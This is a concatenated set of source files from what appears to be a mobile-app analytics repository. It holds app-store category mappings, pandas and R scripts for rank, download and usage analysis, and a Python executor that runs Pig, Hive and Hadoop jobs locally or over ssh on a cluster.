7015: u'Games Simulation',
7016: u'Games Sports',
7017: u'Games Strategy',
7018: u'Games Trivia',
7019: u'Games Word',
360: u'Kids',
361: u'Kids 5 & Under',
362: u'Kids Ages 6-8',
363: u'Kids Ages 9-11',
}
FEEDS_DICT_IOS ={
0: 'iphone_free',
1:'iphone_paid',
2:'iphone_revenue',
100:'ipad_paid',
101:'ipad_free',
102:'ipad_revenue'}
STORES_DICT_ANDRIOD = {
3: u'CN',
7: u'GB',
9: u'JP',
10: u'US',
11: u'BE',
16: u'HK',
23: u'NL'}
FEEDS_DICT_ANDRIOD ={
0: 'free',
1: 'paid',
2: 'grossing'}
CATEGORIES_DICT_ANDROID = {
1: u'Overall',
2: u'Games',
3: u'Games Arcade & Action',
4: u'Games Brain & Puzzle',
5: u'Games Cards & Casino',
6: u'Games Casual',
7: u'Games Live Wallpaper',
8: u'Games Racing',
9: u'Games Sports',
10: u'Games Widgets',
11: u'Applications',
12: u'Books & Reference',
13: u'Business',
14: u'Comics',
15: u'Communication',
16: u'Education',
17: u'Entertainment',
18: u'Finance',
19: u'Health & Fitness',
20: u'Libraries & Demo',
21: u'Lifestyle',
22: u'Apps Live Wallpaper',
23: u'Media & Video',
24: u'Medical',
25: u'Music & Audio',
26: u'News & Magazines',
27: u'Personalization',
28: u'Photography',
29: u'Productivity',
30: u'Shopping',
31: u'Social',
32: u'Sports',
33: u'Tools',
34: u'Transportation',
35: u'Travel & Local',
36: u'Weather',
37: u'App Widgets',
38: u'Games Action',
39: u'Games Adventure',
40: u'Games Word',
41: u'Games Arcade',
42: u'Games Board',
43: u'Games Card',
44: u'Games Casino',
46: u'Games Educational',
47: u'Games Family',
48: u'Games Music',
49: u'Games Puzzle',
51: u'Games Role Playing',
52: u'Games Simulation',
54: u'Games Strategy',
55: u'Games Trivia',
}
<file_sep>/candidates_test/generate_data.py
'''
Created on May 17, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
def flag_universals(df):
free = df[(df['feed_id']==0) | (df['feed_id']==101)]
#paid = df[(df['feed_id']==1) | (df['feed_id']==100)]
free = free.groupby(['date', 'app_id', 'category_id']).size().reset_index()
#paid = paid.groupby(['date', 'app_id', 'category_id']).size().reset_index()
#df = pd.concat([free, paid])
df = free
df.rename(columns={0:'universal'}, inplace=True)
df['universal'] = df['universal']-1
df = df[['date', 'app_id', 'universal']].drop_duplicates()
return df
if __name__ == '__main__':
f_actuals = '/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/real_daily_raw/143441_Downloads_2013-02-01--2013-02-28.csv'
f_ranks = ['/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/est_daily_raw/143441_0_2013-02-01--2013-02-28.csv',
'/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/est_daily_raw/143441_101_2013-02-01--2013-02-28.csv']
#'/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/est_daily_raw/143441_100_2013-02-01--2013-02-28.csv',
#'/Users/perezrafael/appannie/data_science/evaluation/data/ios/2013-02/est_daily_raw/143441_101_2013-02-01--2013-02-28.csv']
actuals = pd.read_csv(f_actuals)
ranks = map(pd.read_csv, f_ranks)
ranks = pd.concat(ranks)
ranks = ranks.drop('estimate', axis=1)
ranks = ranks[ranks['category_id']==36]
universals = flag_universals(ranks)
df = ranks.merge(actuals, on=['date', 'app_id'], how='left')
df = df.merge(universals, on=['date', 'app_id'], how='left')
df = df[df['feed_id']==0]
df = df.drop(['category_id', 'feed_id'], axis=1).drop_duplicates()
app_ids = df[['app_id']].drop_duplicates().reset_index().reset_index().drop('index', axis=1)
dates = df[['date']].drop_duplicates().reset_index().reset_index().drop('index', axis=1)
df = df.merge(app_ids, on='app_id').drop('app_id', axis=1).rename(columns={'level_0':'app_id'})
df = df.merge(dates, on='date').drop('date', axis=1).rename(columns={'level_0':'date'})
df['date'] = df['date']+1
df = df.drop_duplicates()
df = df.sort(['date', 'rank'])
df.to_csv('data.csv', index=False)
<file_sep>/evaluation/py/get_app_daily_weights.py
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
import numpy as np
from joblib import Parallel, delayed
# This step is time-consuming and we parallelize
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
Parallel(n_jobs=4)(delayed(_run)(f, input_dir, output_dir)
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)))
def _run(f, input_dir, output_dir):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
apps_daily_weights = _get_daily_weights(df)
#merged_info = apps_daily_weights.merge(df, how='inner', on=['app_id', 'date'])
apps_daily_weights.to_csv(os.path.join(output_dir, f), index=False)
# apps_median.to_csv(os.path.join(output_dir, f), index=False)
def _get_daily_weights(df):
def calculate_weight(x):
if x<21:
return 1
elif x<201:
return 0.5
else:
return 0.1
grouped = df.groupby(['date', 'app_id'])['rank'].min()
agg = grouped.reset_index()
agg = agg[['app_id', 'date', 'rank']]
agg = agg.drop_duplicates()
agg['daily_weights'] = agg['rank'].apply(calculate_weight)
agg = agg.drop(['rank'], axis=1)
app_weights = agg.groupby(['app_id', 'date'])
#max_ranks = agg.groupby('app_id').aggregate({'max_rank': lambda x: ','.join(x)})
return app_weights.reset_index()
if __name__ == '__main__':
main()
<file_sep>/evaluation/py/concat_feeds.py
"""
Aggregate different feeds
"""
# Author: <NAME> <<EMAIL>>
import pandas as pd
import numpy as np
from internal.feeds_groupby_and_apply import feeds_groupby_and_apply
def main():
feeds_groupby_and_apply(pd.concat)()
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/hive_scripts/workflow/conf/rq_settings_example.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
QUEUES = ['workflow']<file_sep>/google-analytics/r_codes/Cross-Check.R
library(xlsx)
library(lda)
library(fpc)
library(cluster)
library(VennDiagram)
MDM = read.xlsx2(file = './data/2015-06-30 us reporters.xlsx', sheetIndex = 1)
GA = read.delim2(file = './data/all_ga_apps.tsv', sep = '\t', header = F, as.is = T,
col.names = c('app_id', 'app_name', 'platfrom'))
iTC = read.xlsx2(file = './data/PROD - FREE - iTC Analytics Usage Benchmarking Data.xlsx', sheetIndex = 4)
GA = unique(GA)
temp = read.csv('~/Downloads/App_Annie_Usage_Intelligence_Top_Usage_iPhone_United States_Overall_2015-06-01_2015-06-30.csv')
# intersection
merged1 = merge(x = MDM, y = GA, by.x = 'package.id', by.y = 'app_id', all = F)
merged2 = merge(x = MDM, y = iTC, by.x = 'package.id', by.y = 'App.ID', all = F)
merged3 = merge(x = GA, y = iTC, by.x = 'app_id', by.y = 'App.ID', all = F)
penetration_diff = as.numeric(as.character(merged2$penetration)) - as.numeric(as.character(merged2$Usage.Penetration))
penetration_pct_diff = (as.numeric(as.character(merged2$penetration)) - as.numeric(as.character(merged2$Usage.Penetration))) / as.numeric(as.character(merged2$penetration))
hist(penetration_diff, breaks = 200, col = 'blue')
quantile(penetration_diff, probs = seq(0, 1, 0.2) )
hist(penetration_pct_diff, breaks = 200, col = 'blue')
quantile(penetration_pct_diff, probs = seq(0, 1, 0.2) )
merged4 = merge(merged1, merged2, by = 'package.id', all = F)
##################################################################################
# Usage data - top 1500 apps
# My Data Manager data for IOS and Android and US only
android = read.csv('./data/App_Annie_Usage_Intelligence_Top_Usage_Android_United States_Overall_2015-06-01_2015-06-30 (1).csv')
ios = read.csv('./data/App_Annie_Usage_Intelligence_Top_Usage_iOS_United States_Overall_2015-06-01_2015-06-30 (2).csv')
temp = android[!duplicated(android$App.ID),c(1,8)]
temp_1 = ios[!duplicated(ios$App.ID),c(1,8)]
merged_android = merge(x = android, y = GA, by.x = 'App.ID', by.y = 'app_id', all = F)
merged_ios = merge(x = ios, y = GA, by.x = 'App.ID', by.y = 'app_id', all = F)
merged_android = merge(x = android, y = MDM, by.x = 'App.ID', by.y = 'package.id', all = F)
merged_ios = merge(x = ios, y = MDM, by.x = 'App.ID', by.y = 'package.id', all = F)
temp = merged_android[!duplicated(merged_android$App.ID),c(1,8)]
temp_1 = merged_ios[!duplicated(merged_ios$App.ID),c(1,8)]
# Convert percent to numeric
hist(as.numeric(sub('%', '', android$Usage.Penetration))/100, breaks = 100)
hist(as.numeric(sub('%', '', ios$Install.Penetration))/100, breaks = 100)
hist(as.numeric(sub('%', '', ios$Usage.Penetration))/100, breaks = 100)
quantile(as.numeric(sub('%', '', ios$Install.Penetration))/100, probs = seq(0.1, 1, 0.1))
quantile(as.numeric(sub('%', '', ios$Usage.Penetration))/100, probs = seq(0.1, 1, 0.1))
View(merged_ios[,c(1,2,3,5,7,8,16)])
merged_android = merge(x = android, y = MDM, by.x = 'App.ID', by.y = 'package.id', all = F)
merged_ios = merge(x = ios, y = MDM, by.x = 'App.ID', by.y = 'package.id', all = F)
# What is X..Active.Day -- percentage of the active days in a month
hist(as.numeric(sub('%', '', android$X..Active.Days)) / android$Avg.Active.Days)
##################################################################################
# Venn Visualization
grid.newpage()
draw.single.venn(22, category = 'Google Analytics', lty='blank',
fill='cornflower blue', alpha = 0.5)
grid.newpage()
draw.pairwise.venn(area1 = 22, area2 = 10, cross.area = 5,
category = c('Google Analytics', 'MDM'),
lty='blank', fill= c('cornflower blue', 'pink'), alpha = rep(0.5, 2))
grid.newpage()
draw.triple.venn(area1 = 5374, area2 = 25755, area3 = 916, n12 = 124, n23 = 876, n13 = 17, n123 = 15,
category = c('Google Analytics', 'MDM', 'iTC'),
lty='blank', fill= c('light blue', 'pink', 'orange'), alpha = rep(0.6, 3))
# New GA pull and Full MyDM
grid.newpage()
draw.pairwise.venn(area1 = 4519, area2 = 4712, cross.area = 3945,
category = c('Old\nGoogle Analytics', 'New\nGoogle Analytics'),
lty='blank', fill= c('light blue', 'pink'), alpha = rep(0.6, 2), cex=2, cat.cex = rep(1.5,1.5))
grid.newpage()
draw.triple.venn(area1 = 4519, area2 = 4712, area3 = 47196, n12 = 3945, n23 = 443, n13 = 450, n123 = 372,
category = c('Old Google Analytics', 'New Google Analytics', 'MyDM'),
lty='blank', fill= c('light blue', 'pink', 'orange'), alpha = rep(0.6, 3))
temp = summary(as.factor(GA$platfrom))
temp1 = summary(as.factor(MDM$platform))
pie(x = temp, labels = c('Android', 'iOS'), col=c('peachpuff', 'light green'), main = 'Google Analytics', radius = 1.0)
pie(x = temp1, labels = c('Android', 'iOS'), col=c('pink', 'light blue'), main = 'MDM', radius = 1 )
##################################################################################
# Statistical test
# t-test
t.test(x = as.numeric(sub(pattern = '%', '', x = ios$Usage.Penetration))/100.0,
y = as.numeric(sub(pattern = '%', '', x = android$Usage.Penetration))/100.0 )
# ANOVA
temp_all = rbind(ios[1:16], android[1:16])
temp_all$Usage.Penetration = as.numeric(sub(pattern = '%', '', x = temp_all$Usage.Penetration) ) / 100.0
# one-way
summary(aov(Usage.Penetration ~ Device, data=temp_all))
# two-way
summary(aov(Usage.Penetration ~ Store + Device, data=temp_all))
# ios Device
ios$Usage.Penetration = as.numeric(sub(pattern = '%', '', x = ios$Usage.Penetration) ) / 100.0
summary(aov(Usage.Penetration ~ Device, data=ios))
# android Device
android$Usage.Penetration = as.numeric(sub(pattern = '%', '', x = android$Usage.Penetration) ) / 100.0
summary(aov(Usage.Penetration ~ Device, data=android[android$Device!='Phone + Tablet',]))
t.test(android[android$Device=='Phone + Tablet',]$Usage.Penetration, android[android$Device=='Phone',]$Usage.Penetration)
##################################################################################
# 1. time since release
# 2. category of apps
# 3. Usage Penetration --- inverse relation of Panel size
# 4. Error Estimation --- active user selection criterias
# check correlation estimate between Usage Intelligence and GA
convertor = function(data)
{
data$Usage.Penetration = as.numeric(sub('%', '', data$Usage.Penetration)) / 100
for(name in colnames(data))
{
if(name != 'Usage.Penetration')
{
data[,name] = as.numeric(as.character(data[,name]))
}
}
return(data)
}
colnames(android)
feature_names = c("Usage.Penetration", "Avg.Active.Days", "Avg.MB...Session")
# convert to numeric
numeric_matrix = convertor(android[feature_names])
summary(numeric_matrix)
# remove NAs
for (i in 1:ncol(numeric_matrix) )
{
numeric_matrix[is.na(numeric_matrix[,i]),i] = mean(numeric_matrix[,i], na.rm = T)
}
summary(numeric_matrix)
# scaling
numeric_matrix = scale(numeric_matrix, center = F)
hist(numeric_matrix[,2], breaks = 100, xlab = 'Number of Days', main = 'Distribution of Avg.Active.Day', col='blue')
# log transformation
numeric_matrix = log(numeric_matrix)
# distribution
hist(numeric_matrix[,2], breaks = 100, xlab = 'Transformed Number of Days', main = 'Transformed Distribution of Avg.Active.Day', col = 'blue')
####################################################################################
# elbow to find the # of centroid
# kmean - silhouette score and euclidean distance
number_K = 15
wss = nrow(nrow(numeric_matrix) - 1) * sum(apply(numeric_matrix, 2, var))
km = numeric(number_K)
for (i in 2:number_K)
{
centroid = kmeans(numeric_matrix, centers = i)
wss[i] = sum(centroid$withinss)
sil2 = summary(silhouette(centroid$cluster, daisy(numeric_matrix) ))
km[i] = sil2$avg.width
}
plot(1:number_K, wss, type = 'b', xlab = 'Number of Clusters', ylab = 'sum of Euclid distance')
k.best = which.max(km)
print('K-means method:')
cat('number of clusters with optimum average silhouette score:', k.best, '\n')
plot(1:number_K, km, col='red', cex=2, pch=20, ylim = range(0.1,0.4), ylab = 'silhouette score', xlab = 'K', main='K-Mean')
# k-medoid method - silhouette score
asw = numeric(number_K)
for (i in 2:number_K)
{
obj = pam(numeric_matrix, k = i)
asw[[i]] = obj$silinfo$avg.width
#plot(obj)
}
k.best = which.max(asw)
print('k-medoid separation method:')
cat('number of clusters with optimum average silhouette score:', k.best, '\n')
plot(1:number_K, asw, col='green', cex=2, pch=20, ylab = 'silhouette score', xlab = 'K')
# hierachical clustering
sil = numeric(number_K)
d = dist(numeric_matrix, method = 'euclidean')
hcl = hclust(d, method = 'ward.D' )
#plot(hcl)
for (i in 2:number_K)
{
groups = cutree(hcl, k = i)
#rect.hclust(hcl, k = i, border = 'red')
si = summary( silhouette(groups, daisy(numeric_matrix)) )
sil[i] = si$avg.width
#plot(si, nmax=200, cex.names = 1)
}
k.best = which.max(sil)
print('Hierachical clustering:')
cat('number of clusters with optimum average silhouette score:', k.best, '\n')
plot(1:number_K, sil, col='blue', cex=2, pch=20, ylim = range(0.1,0.4), ylab = 'silhouette score', xlab = 'K', main = 'Hierachical Clustering')
####################################################################################
# validation
N = length(groups)
#groups = cutree(hcl, k = 3)
groups = kmeans(numeric_matrix, centers = 3)$cluster
summary(as.factor(groups))
summary(as.factor(android$Device))
dev = c( 'Phone','Phone+Tablet', 'Tablet')
sum = 0
for (i in 1:20)
{
cat(as.character(android$Device[i]), dev[groups[i]], '\n')
sum = sum + (as.character(android$Device[i]) == dev[groups[i]])
}
print(sum/N)
<file_sep>/old_investigations/internal/concat_by_daterange.py
"""
Concat date by the date range given.
"""
# Author: <NAME> <<EMAIL>>
import os.path
from dateutil import rrule
from internal import stores_dict
import pandas as pd
MONTHLY_CACHE_DIR = './cache/monthly'
def concat_by_daterange(dtstart, dtend, opts):
for store in opts.stores:
for units_type in opts.units_types:
print("%s %s" % (stores_dict.query_country(store), units_type))
outfile = "./data/%s_%s--%s_%s.csv" % (stores_dict.query_country(store),
dtstart.date(),
dtstart.date(),
units_type)
if not opts.overwrite and os.path.exists(outfile):
print ("Cache exists. Use cached version. %s" % outfile)
else:
df = _do_concat(store, units_type, dtstart, dtend)
df.to_csv("./data/%s_%s--%s_%s.csv" % (stores_dict.query_country(store),
dtstart.date(),
dtend.date(),
units_type))
def _do_concat(store, units_type, dtstart, dtend):
months = rrule.rrule(rrule.MONTHLY, dtstart=dtstart, until=dtend)
stacked_df = []
print "Selecting from %s to %s (inclusive)" % (dtstart.date(), dtend.date())
# Select from monthly cache for data that is in the daterange.
for m in months:
data_monthly = _fetch_monthly_cache(store, units_type, m)
data_range = _select_data_in_range(data_monthly, dtstart, dtend)
stacked_df.append(data_range)
return pd.concat(stacked_df, axis=0)
def _fetch_monthly_cache(store, units_type, m):
year = '%d' % m.year
month = '%.2d' % m.month
country = stores_dict.query_country(store)
filename = '%s_%s-%s_%s.csv' % (country, year, month, units_type)
return pd.read_csv(os.path.join(MONTHLY_CACHE_DIR, filename))
def _select_data_in_range(data_monthly, dtstart, dtend):
data_monthly['date'] = data_monthly['date'].astype('datetime64')
data_monthly = data_monthly.sort_index(by='date')
sel = (data_monthly['date'] >= dtstart) & (data_monthly['date'] <= dtend)
return data_monthly.ix[sel]
<file_sep>/old_investigations/android/generate_everything.sh
#!/bin/bash
# This is an example of using various scripts to generate everything
set -e
set -o pipefail
declare -a countries=('United States' 'China' 'Japan' 'South Korea')
declare year=2012
declare month=08
declare month_end=31
#we ignore China here.
store_ids="10,3,9,27"
#do clean
if [ -d "cache" ]
then
find cache -size 0 -exec rm '{}' \;
fi
## Prepare the data
python run_fetch_and_concat.py -s $store_ids -d"$year-$month" -u "Downloads,USD"
for ((i=0; i<${#countries[@]}; i++))
do
c=${countries[$i]}
echo "Calculating SDA for ${c}..."
python run_calculate_sda.py -d "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_Downloads.csv" -u "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_USD.csv" -r "Rafael_data_July/${c}/AppAnnie_Estimates.csv"
python run_calculate_sda.py -d "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_Downloads.csv" -u "data/${c}_${year}-${month}-01--${year}-${month}-${month_end}_USD.csv"
#echo "Generating Plots..."
#Rscript plot_80_20.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_With_Reference_Aggregated.csv"
#Rscript plot_dist.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_With_Reference_Aggregated.csv"
#Rscript plot_improvement.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_With_Reference_Aggregated.csv"
Rscript plot_80_20.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_dist.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_improvement.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Aggregated.csv"
Rscript plot_80_20_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_dist_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_improvement_daily_vs_overall.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_80_20_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_dist_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
Rscript plot_improvement_daily_vs_games.R "sda/SDA_${c}_${year}-${month}-01--${year}-${month}-${month_end}_Daily.csv"
echo "Finished, check the ./plots folder"
done
<file_sep>/aa_au_model/hive_scripts/workflow/module/executor.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import os
import sys
import commands
import re
import redis
import happybase
import copy
import itertools
import copy_reg
import types
from importlib import import_module
from multiprocessing import Pool
from happybase.hbase.Hbase import AlreadyExists
from hdfs import HDFSStorage
from s3 import S3Storage
from utils import generate_pig_file, load_schema, STORE_STR_FUNC_MAPPING, parse_s3_str, generate_hive_file
def _pickle_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
copy_reg.pickle(types.MethodType, _pickle_method)
class Executor(object):
"""
Executor base class
"""
_script_file_path = None
def __init__(self, script_file_path, t=None, alert_on_fail=False, script_type=None):
self._script_file_path = script_file_path
self.alert_on_fail_flag = alert_on_fail
self.t = t
self._script_type = script_type
@staticmethod
def get_executor(script_type):
if script_type == 'pig':
return PigExecutor
elif script_type.startswith('loop'):
return LoopExecutor
elif script_type == 'shell':
return ShellExecutor
elif script_type == 'python':
return PythonExecutor
elif script_type == 'streaming':
return StreamingExecutor
elif script_type == 'hive':
return HiveExecutor
else:
return None
def del_s3_zero_file(self, s3_str):
access_key, secret_key, bucket_name, key_name = parse_s3_str(s3_str)
s = S3Storage(access_key, secret_key)
for k in s.list(bucket_name, key_name):
if not k.endswith('_SUCCESS') and s.size(bucket_name, k) == 0:
s.delete(bucket_name, k)
def pre_del_local_data(self, file):
status, output = 0, ''
try:
status, output = commands.getstatusoutput(
'rm -rf %s' % file
)
except Exception as ex:
status, output = -1, str(ex)
return status, output
def pre_del_s3_data(self, s3_str):
status, output = 0, ''
access_key, secret_key, bucket_name, key_name = parse_s3_str(s3_str)
try:
s = S3Storage(access_key, secret_key)
for k in s.list(bucket_name, key_name):
s.delete(bucket_name, k)
except Exception as ex:
status, output = -1, str(ex)
return status, output
def pre_del_hdfs_data(self, file):
status, output = 0, ''
try:
HDFSStorage.delete(file)
except Exception as ex:
status, output = -1, str(ex)
return status, output
def get_master_ip(self, kwargs):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
r = redis.Redis(host=settings.REDIS_HOST, port=settings.REDIS_PORT)
cluster_application_type = kwargs.get('cluster_application_type')
cluster_id = r.get('emr-cluster:%s' % cluster_application_type)
del kwargs['cluster_application_type']
return cluster_id
def alert_on_fail(self, *args, **kwargs):
if self.alert_on_fail_flag:
daily_mail_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0],
'../../monitoring/daily_mail/daily_mail.py'
)
commands.getstatusoutput(
'python %s --context-class=workflow_alert.WorkFlowAlertContext --params=script_file_name:%s' % (
daily_mail_path, kwargs['script_name']
)
)
def run(self, *args, **kwargs):
raise NotImplementedError()
class PigExecutor(Executor):
"""
Pig executor
"""
def create_hbase_table(self, pig_file_path, pig_file_name):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
whole_path = os.path.join(pig_file_path, pig_file_name + '.pig')
pig_file_str = open(whole_path, 'r').read()
all_schemas = re.findall(r'INTO ###(.+?)###', pig_file_str)
for schema_name in set(all_schemas):
schema = load_schema(schema_name)
if schema['type'] == 'hbase':
conn = happybase.Connection(settings.HBASE_THRIFT_HOST)
cf = dict(
(s[0].split(':')[0], dict())
for s in schema['schema']
)
try:
conn.create_table(schema['table'], cf)
except AlreadyExists:
pass
def run(self, *args, **kwargs):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
mode_str = ''
if self.t or "running_locally" in kwargs:
mode_str = '-x local'
pig_file_path, pig_file_name = self._script_file_path.rsplit('/', 1)
pig_file_name = pig_file_name.replace('.pig', '')
running_file, output_path_list = generate_pig_file(
pig_file_path, pig_file_name, kwargs, self.t
)
if not self.t:
self.create_hbase_table(pig_file_path, pig_file_name)
for f in output_path_list:
for p, v in kwargs.iteritems():
f = f.replace('$%s' % p, str(v))
if self.t:
status, output = commands.getstatusoutput(
'rm -rf %s' % settings.HDFS_MNT_PREFIX + f
)
elif "running_locally" in kwargs:
status, output = self.pre_del_local_data(f)
elif f.startswith('s3n'):
status, output = self.pre_del_s3_data(f)
else:
status, output = self.pre_del_hdfs_data(f)
if status != 0:
commands.getstatusoutput('rm -rf %s' % running_file)
return status, output
job_conf_params = ' '.join(['-D %s=%s' % (p[1:], v) for p, v in kwargs.iteritems() if p.startswith('D')])
if not self.t:
job_conf_params += ' -D hadoop.job.history.user.location=none'
params = ' '.join([
'-param %s=%s' % (p, v) for p, v in kwargs.iteritems() if not p.startswith('D')
]).replace('"', '\\"')
if self.t or "running_locally" in kwargs:
status, output = commands.getstatusoutput(
'cd %s;pig %s %s %s %s' % (pig_file_path, job_conf_params, mode_str, params, running_file)
)
else:
master_ip = self.get_master_ip(kwargs)
if not master_ip:
commands.getstatusoutput('rm -rf %s' % running_file)
return -1, 'No master_ip found'
dest_file = running_file[running_file.find('aardvark-analyze'):]
dest_path = dest_file.rsplit('/', 1)[0]
status, output = commands.getstatusoutput(
'scp -rqC -o StrictHostKeyChecking=no -i %s %s hadoop@%s:%s' % (
settings.EMR_KEY_PAIR_FILE, running_file, master_ip, dest_path + '/'
)
)
status, output = commands.getstatusoutput(
'ssh -o StrictHostKeyChecking=no hadoop@%s -i %s '
'--command "cd %s;~/pig/bin/pig %s %s %s %s"' % (
master_ip, settings.EMR_KEY_PAIR_FILE, dest_path,
mode_str, job_conf_params, params, '~/' + dest_file
)
)
if status != 0:
self.alert_on_fail(script_name=pig_file_name + '.pig')
commands.getstatusoutput('rm -rf %s' % running_file)
return status, output
class ShellExecutor(Executor):
"""
Shell executor
"""
def run(self, *args):
shell_file_path, shell_file_name = self._script_file_path.rsplit('/', 1)
shell_file_name = shell_file_name.replace('.sh', '')
running_path = os.path.join(shell_file_path, shell_file_name + '.sh')
params = ' '.join(['%s' % p for p in args])
status, output = commands.getstatusoutput(
'sh %s %s' % (running_path, params)
)
if status != 0:
self.alert_on_fail(script_name=shell_file_name + '.sh')
return status, output
class PythonExecutor(Executor):
"""
Python executor
"""
def run(self, *args, **kwargs):
params = ''
if args:
params = ' '.join(map(str, args))
if kwargs:
params += ' '
params += ' '.join(['--%s=%s' % (k, str(v)) for k, v in kwargs.iteritems()])
status, output = commands.getstatusoutput(
'python %s %s' % (self._script_file_path, params)
)
if status != 0:
self.alert_on_fail(script_name=self._script_file_path)
return status, output
class StreamingExecutor(Executor):
"""
Hadoop Streaming executor
"""
def replace_params(self, path, kwargs):
keys_to_remove = []
kwargs = sorted(kwargs.iteritems(), key=lambda asd: asd[0], reverse=True)
for k, v in kwargs:
if '$' + k in path:
path = path.replace('$' + k, str(v))
keys_to_remove.append(k)
return path, keys_to_remove
def run(self, *args, **kwargs):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
streaming_file_path = self._script_file_path
mode_str = '-D hadoop.job.history.user.location=none'
if self.t or "running_locally" in kwargs:
kwargs['Dmapred.job.tracker'] = 'local'
mode_str = '-fs "file:///"'
input_schema = load_schema(kwargs.get('input'))
input_schema['table'] = STORE_STR_FUNC_MAPPING[input_schema['type']](input_schema, self.t)[1]
if self.t or "running_locally" in kwargs:
input_schema['table'] = input_schema['table'].replace('output_root_dir', 'input_root_dir')
input_schema['table'], input_keys_to_remove = self.replace_params(input_schema['table'], kwargs)
output_schema = load_schema(kwargs.get('output'))
output_schema['table'] = STORE_STR_FUNC_MAPPING[output_schema['type']](output_schema, self.t)[1]
output_schema['table'], output_keys_to_remove = self.replace_params(output_schema['table'], kwargs)
keys_to_remove = set(input_keys_to_remove + output_keys_to_remove)
if self.t in kwargs:
keys_to_remove.add('input_root_dir')
keys_to_remove.add('output_root_dir')
for k in keys_to_remove:
del kwargs[k]
running_locally = False
if "running_locally" in kwargs:
running_locally = True
del kwargs['running_locally']
if output_schema:
if self.t:
status, output = commands.getstatusoutput(
'rm -rf %s' % settings.HDFS_MNT_PREFIX + output_schema['table']
)
elif running_locally:
status, output = self.pre_del_local_data(output_schema['table'])
elif output_schema['table'].startswith('s3n'):
status, output = self.pre_del_s3_data(output_schema['table'])
else:
status, output = self.pre_del_hdfs_data(output_schema['table'])
if status != 0:
return status, output
if input_schema['table'] and input_schema['table'].startswith('s3n://') \
and not input_schema.get('need_credential'):
kwargs['input'] = 's3n://' + input_schema['table'].rsplit('@')[1]
else:
kwargs['input'] = input_schema['table'] or ''
if output_schema['table'] and output_schema['table'].startswith('s3n://') \
and not output_schema.get('need_credential'):
kwargs['output'] = 's3n://' + output_schema['table'].rsplit('@')[1]
else:
kwargs['output'] = output_schema['table'] or ''
job_conf_params = ' '.join(['-D %s=%s' % (p[1:], v) for p, v in kwargs.iteritems() if p.startswith('D')])
if 'libjars' in kwargs:
job_conf_params += ' -libjars %s' % kwargs['libjars']
del kwargs['libjars']
if 'files' in kwargs:
job_conf_params += ' -files %s' % kwargs['files']
del kwargs['files']
params = ' '.join([
'-%s %s' % (p, v) for p, v in kwargs.iteritems()
if not p.startswith('D') and p != 'cluster_application_type'
])
if self.t or running_locally:
cmd = 'cd %s;hadoop jar %s %s %s %s' % (
streaming_file_path, settings.STREAMING_JAR,
mode_str, job_conf_params, params
)
status, output = commands.getstatusoutput(cmd)
else:
master_ip = self.get_master_ip(kwargs)
if not master_ip:
return -1, 'No master_ip found'
dest_path = streaming_file_path[streaming_file_path.find('aardvark-analyze'):]
cmd = (
'ssh -o StrictHostKeyChecking=no hadoop@%s -i %s '
'--command "cd %s;hadoop jar %s %s %s %s"'
) % (
master_ip, settings.EMR_KEY_PAIR_FILE,
dest_path, settings.STREAMING_JAR, job_conf_params.replace('"', '\\"'),
mode_str, params.replace('"', '\\"')
)
status, output = commands.getstatusoutput(cmd)
if status != 0:
self.alert_on_fail(script_name=self._script_file_path)
return status, output
class HiveExecutor(Executor):
"""
Hive executor
"""
def run(self, *args, **kwargs):
sys.path.append(
os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
mode_str = ''
if self.t or "running_locally" in kwargs:
mode_str = '-hiveconf hive.exec.mode.local.auto=true'
hive_file_path, hive_file_name = self._script_file_path.rsplit('/', 1)
hive_file_name = hive_file_name.replace('.sql', '')
running_file, output_path_list = generate_hive_file(
hive_file_path, hive_file_name, kwargs, self.t
)
for f in output_path_list:
for p, v in kwargs.iteritems():
f = f.replace('$%s' % p, str(v))
if "running_locally" in kwargs:
self.pre_del_local_data('derby.log')
self.pre_del_local_data('metastore_db')
self.pre_del_local_data('TempStatsStore')
status, output = self.pre_del_local_data(f)
if status != 0:
commands.getstatusoutput('rm -rf %s' % running_file)
return status, output
job_conf_params = ' '.join([
'-hiveconf %s=%s' % (p[1:], v) for p, v in kwargs.iteritems()
